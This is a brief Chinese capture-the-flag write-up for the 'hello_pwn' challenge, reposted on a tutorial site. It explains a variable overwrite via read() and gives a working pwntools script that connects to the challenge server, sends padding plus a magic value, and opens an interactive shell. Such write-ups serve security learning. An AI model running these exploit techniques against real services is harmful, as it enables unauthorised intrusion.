攻防世界 | hello_pwn

看样子是要让我们通过read(0, &unk_601068, 0x10uLL)，读入 unk_601068 将 dword_60106C 覆盖

6c-68=4,所以：

from pwn import *
io = remote("111.198.29.45",45604)
io.recvline()
payload = "A"*4
payload += p64(1853186401)
io.sendline(payload)
io.interactive()

来源：https://www.cnblogs.com/chrysanthemum/p/11764423.html

标签

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!